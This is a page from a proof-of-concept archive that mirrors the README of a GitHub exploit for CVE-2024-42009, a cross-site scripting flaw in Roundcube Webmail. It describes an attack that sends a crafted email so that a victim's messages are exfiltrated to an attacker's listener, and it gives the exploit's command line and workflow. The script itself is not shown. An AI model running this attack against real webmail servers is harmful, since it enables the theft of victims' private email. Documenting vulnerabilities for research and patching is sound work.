Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2024-42009 PoC — Roundcube Webmail 安全漏洞

Source
https://github.com/Bhanunamikaze/CVE-2024-42009
Associated Vulnerability
Title:Roundcube Webmail 安全漏洞 (CVE-2024-42009)
Description:A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7 allows a remote attacker to steal and send emails of a victim via a crafted e-mail message that abuses a Desanitization issue in message_body() in program/actions/mail/show.php.
Description
This Proof of Concept (PoC) demonstrates an exploit for CVE-2024-42009, leveraging a cross-site scripting (XSS) vulnerability to extract emails from a target webmail application. The attack injects a malicious payload that exfiltrates email content to an attacker-controlled listener.
Readme
# CVE-2024-42009 PoC: Email Capture Listener & XSS Exploit

## Overview
This Proof of Concept (PoC) demonstrates an exploit for CVE-2024-42009, leveraging a cross-site scripting (XSS) vulnerability to extract emails from a target webmail application. The attack injects a malicious payload that exfiltrates email content to an attacker-controlled listener.

## Features
- Exploits an XSS vulnerability to capture email contents.
- Uses an HTTP listener to receive and decode exfiltrated emails.
- Automates payload injection and exfiltration.

## Requirements
- Python 3.x
- Required dependencies (install via pip):
  ```sh
  pip install requests beautifulsoup4
  ```

## Usage
Run the script with the necessary arguments:

```sh
python exploit.py -fu attacker@example.com -tu victim@example.com -u http://target.com/contact -ip YOUR_IP -p 1337
```

### Parameters
| Argument | Description |
|----------|-------------|
| `-fu`, `--from-user` | The sender's email address |
| `-tu`, `--to-user` | The recipient's email address |
| `-u`, `--target-url` | The target webmail URL |
| `-ip`, `--server-ip` | The attacker's listener IP address |
| `-p`, `--server-port` | The port for the listener (default: 1337) |

## Attack Workflow
1. **Start Listener**: The script starts an HTTP server to capture extracted emails.
2. **Inject Malicious Payload**: The XSS payload is sent via a crafted email.
3. **Trigger Execution**: When the victim opens the email, the payload executes and sends the email content to the attacker's server.
4. **Capture & Decode**: The extracted email content is decoded and displayed.

## Example Output
```
[*] CVE-2024-42009 PoC: Listening on 192.168.1.100:1337...
[*] Sending payload for UID 1...
[+] Payload sent for UID 1 (Status: 200)

[+] Captured Email Content:
Hello, this is a test email!
```

## Disclaimer
This PoC is for educational and research purposes only. Unauthorized testing against systems without consent is illegal. Use responsibly!
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →